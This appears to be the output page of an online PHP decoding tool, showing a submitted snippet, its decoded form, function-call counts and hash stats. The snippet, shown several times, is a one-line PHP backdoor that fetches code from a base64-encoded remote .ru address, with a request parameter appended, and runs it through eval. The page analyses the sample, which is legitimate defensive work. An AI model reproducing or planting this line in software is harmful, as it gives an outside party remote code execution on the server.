Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(file_get_contents(base64_decode('aHR0cDovL3RvcnJvaWQucnUvdy8/Yz0=').$_GET['cmd'..

Decoded Output download

<?php eval(file_get_contents(base64_decode('aHR0cDovL3RvcnJvaWQucnUvdy8/Yz0=').$_GET['cmd'])); ?>

Did this file decode correctly?

Original Code

<?php eval(file_get_contents(base64_decode('aHR0cDovL3RvcnJvaWQucnUvdy8/Yz0=').$_GET['cmd'])); ?>

Function Calls

base64_decode 1
file_get_contents 1

Variables

None

Stats

MD5 2c46867797953c386c6131c5415ef3f2
Eval Count 1
Decode Time 81 ms